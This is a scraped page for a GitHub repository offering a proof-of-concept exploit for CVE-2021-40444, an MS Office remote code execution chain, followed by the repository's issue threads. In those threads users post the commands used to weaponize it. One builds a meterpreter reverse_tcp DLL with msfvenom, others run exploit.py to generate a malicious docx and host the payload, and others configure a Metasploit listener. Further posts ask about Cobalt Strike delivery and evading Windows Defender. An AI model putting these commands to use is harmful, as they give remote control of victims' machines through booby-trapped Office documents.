lockedbyte / cve-2021-40444 Goto Github PK

View Code? Open in Web Editor NEW

1.5K 1.5K 481.0 673 KB

CVE-2021-40444 PoC

HTML 75.85% Python 24.15%

cve-2021-40444's Introduction

N-day Exploits

CVE-2019-18634: Linux sudo LPE exploit for a stack-based buffer overflow in tgetpass.c
CVE-2020-28018: Linux Exim RCE exploit for a Use-After-Free in tls-openssl.c
CVE-2020-9273: Linux ProFTPd RCE exploit for a Use-After-Free in pool allocator
CVE-2021-3156: Linux LPE exploit for a heap-based buffer overflow in sudo
CVE-2021-40444: Microsoft Windows RCE exploit for a MS Office bug chain
CVE-2022-0185: Linux Kernel LPE exploit for an integer underflow in fs_context.c
CVE-2022-2586: Linux Kernel LPE exploit for an nft_object Use-After-Free

Talk slides

Exploiting sudo CVE-2021-3156: From heap-based overflow to LPE/EoP: Talk about the process and internals of the sudo heap-based overflow vulnerability and its exploitation paths.
CVE-2020-28018: From Use-After-Free to Remote Code Execution: Talk on going through the internals and exploitation of a Use-After-Free vulnerability in Exim to achieve Remote Code Execution.
Confronting CFI: Control-flow Hijacking in the Intel CET era for memory corruption exploit development: Talk on analyzing modern CFI mitigations and their impact on memory corruption exploits.

Blog posts

Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273): Blog post on exploiting a Use-After-Free in ProFTPd to achieve Remote Code Execution
From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim): Blog post analyzing a Use-After-Free vulnerability in Exim and the development of a RCE exploit
CVE-2021-3156 – sudo heap-based overflow leading to privilege escalation (PoC development): Post about developing an exploit for a heap-based buffer overflow on sudo leading to LPE (CVE-2021-3156)
CVE-2019-18634 OOB write – analysis and development of a working PoC: Post about the development of an exploit for a stack-based buffer overflow in sudo leading to LPE (CVE-2019-18634)

Other projects

Protcheck: Parse ELF executables to identify enabled memory mitigations

cve-2021-40444's People

Contributors

Stargazers

Watchers

Forkers

marcoshat rtfghd i128 l1nkd34d benheise arphanetx redheadsec pwndumb projectboot rvrsh3ll 3lp4tr0n jermainlaforce xurse shutupandhack-club crackercat sairson strf0x1 askyeye magicpipersec-archive fengjixuchui phuong39 w4tchd09 scriptidiot r3dc4t0x00 aletnox zephrfish viper-sec trevormerritt idkwim badboycxcc jeromeyoung d-rn p2-98 ajinwu udyz jabriyel hanhvietphan knooow shanfenglan itsmenaga suriya73 prettyrecon jxcyber leftp vngkv123 pisut4152 fork-and-test anonyvietofficial ta0ing randsec prcabral dcmjid gl4ssesbo1 eric-ant rns-sec lehonid yangsirrr gdraperi 3m1za4 th3blackp3arl wikijm chadduffey nareshmail dviros beerandgin slowmistio psechopath swagkarna aaaddress1 omaramin17 mr-r3bot cybermonitor zha0 sesyi yehgdotnet ghostnaix hsuan1117 spartanssec wifiuk zigmud ev0x pttsync 0xf4n9x idfix007 lajigithub weldingwit doytsujin mahmoudp90 mosesrenegade curtishoughton dannymas cydave 3k-1 ali0x2f techris45 gavz witchfindertr hazarky hightechsec elbee-cyber

cve-2021-40444's Issues

the .cab file has not been requested, no execution

Hello, I have a issue, on the target machine to open the .docx, I can see a successful request for http://attackIP/exploit.html, but the .cab file has not been requested, no execution

Learn the production of exploit.html

Hello, can you explain how exploit.html is implemented? For example, I just download a specified file first and save it in the specified directory, how can I achieve it?

code 404, message File not found

┌──(root💀Kali)-[/home/king]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.175.139 - - [08/Oct/2021 23:11:32] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:32] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:32] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:32] "HEAD /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "GET /word.html HTTP/1.1" 404 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 501, message Unsupported method ('OPTIONS')
192.168.175.139 - - [08/Oct/2021 23:11:35] "OPTIONS / HTTP/1.1" 501 -
192.168.175.139 - - [08/Oct/2021 23:11:35] code 404, message File not found
192.168.175.139 - - [08/Oct/2021 23:11:35] "HEAD /word.html HTTP/1.1" 404 -

championship.inf

When I finish executing maldoc.docx in vm,,there is no championship.inf file at C:\Users<user>\AppData\Temp\
what should I do ?

Metasploit not sending stage

I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll

Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi

Shared the docx with my victim PC and set metasploit as listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444

Setup the server to trasmit other files: sudo python3 exploit.py host 80

File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:

xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -

But metasploit keeps os listening state, with no changes.

If I execute on victim's powershell the command: rundll32 print.dll, start
Metasploit set the stage successfuly and I can control the victim's PC, which indicates the dll is not the issue.

Any tips on how to troubleshoot?

sh: 1: zip: not found

I am running into an issue when I execute the script per the instructions.
After

[*] Generating malicious docx file

I get an error

sh: 1: zip: not found

And then there is no file in out

I am running this on a fresh Lightsail Ubuntu 20.04 VM

Antivirus

Document is detected by windows defender

FileNotFoundError: [Errno 2] No such file or directory: 'out.cab'

[*] Generating malicious CAB file...
Traceback (most recent call last):
File "/root/CVE-2021-40444-master/exploit.py", line 154, in
generate_payload()
File "/root/CVE-2021-40444-master/exploit.py", line 106, in generate_payload
patch_cab('out.cab')
File "/root/CVE-2021-40444-master/exploit.py", line 38, in patch_cab
f_r = open(path, 'rb')
FileNotFoundError: [Errno 2] No such file or directory: 'out.cab'

Exe instead of dll

Can i put exe instead of dll?
Thanks

The server does not start

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
[*] Option is host HTML Exploit...
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Linking the server to my IP

Hi. Exploit does not knock on Cobalt Strike. I did everything according to the instructions, generated my dll in cobalt (it is on the VPS), then ran python3 exploit.py host 80

Logs:
::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] code 404, message File not found ::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] "GET /srv/artifact.dll HTTP/1.1" 404 - ::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:42:07] "GET /word.cab HTTP/1.1" 200 - ::ffff:xxx.xxx.xxx.xx - - [16/Oct/2021 11:42:52] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "GET /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "GET /word.html HTTP/1.1" 304 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "HEAD /word.html HTTP/1.1" 200 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "HEAD /word.html HTTP/1.1" 200 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "GET /word.cab HTTP/1.1" 200 -
In the terminal on the VPS, requests show, but nothing is shown in Cobalt Strike.

Anti Anti- Virus

Which part of this vulnerability needs to be free from killing when it is exploited? DLL Trojan horse or the file pointed to by the update link in the doc document?

Cannot install lcab

sudo apt-get update
sudo apt-get install lcab
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package lcab is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'lcab' has no installation candidate

Works intermittently

Experiencing where the Word intermittently drops msword.inf in %TEMP%. I click the Word document, it works. Close Word. Clean %TEMP% out. Then click Word document again, and it does not work. I see consistent GET requests for the cab file each time Word document is opened. Any help would be greatly appreciated to get Word to drop consistently.

No such file or directory: 'out.cab'

Getting this error while generating a docx:

<snip>
 adding: word/_rels/document.xml.rels (deflated 75%)
[*] Generating malicious CAB file...
Traceback (most recent call last):
  File "exploit.py", line 154, in <module>
    generate_payload()
  File "exploit.py", line 106, in generate_payload
    patch_cab('out.cab')
  File "exploit.py", line 38, in patch_cab
    f_r = open(path, 'rb')
FileNotFoundError: [Errno 2] No such file or directory: 'out.cab'

question

Hi, I have a question about the generation of the cab,why add this content to the cab file.

I want to add a vbs to the cab, do I need to modify the content of this place?

question

how to combine metasploit and ngrok for different networks?

Error got while genarating playload

This is the error

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
[*] Option is generate a malicious payload...

[ == Options == ]
[ DLL Payload: test/calc.dll
[ HTML Exploit URL: http://192.168.1.2

[] Writing HTML Server URL...
[] Generating malicious docx file...
sh: 1: zip: not found
[] Generating malicious CAB file...
[] Updating information on HTML exploit...
Traceback (most recent call last):
File "/home/rmb/CVE-2021-40444/exploit.py", line 154, in
generate_payload()
File "/home/rmb/CVE-2021-40444/exploit.py", line 119, in generate_payload
p_exp = open('word.html', 'r')
OSError: [Errno 22] Invalid argument: 'word.html'

how can fix that

About win7 ？

I was able to execute successfully on win10, but in win7, I encountered the following situations:

successfully got cab ,but failed to head

how can i fix it

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]
[*] Option is host HTML Exploit...
Traceback (most recent call last):
File "/usr/lib/python3.9/runpy.py", line 197, in _run_module_as_main
return _run_code(code, main_globals, None,
File "/usr/lib/python3.9/runpy.py", line 87, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.9/http/server.py", line 1290, in
test(
File "/usr/lib/python3.9/http/server.py", line 1245, in test
with ServerClass(addr, HandlerClass) as httpd:
File "/usr/lib/python3.9/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.9/http/server.py", line 1288, in server_bind
return super().server_bind()
File "/usr/lib/python3.9/http/server.py", line 138, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in us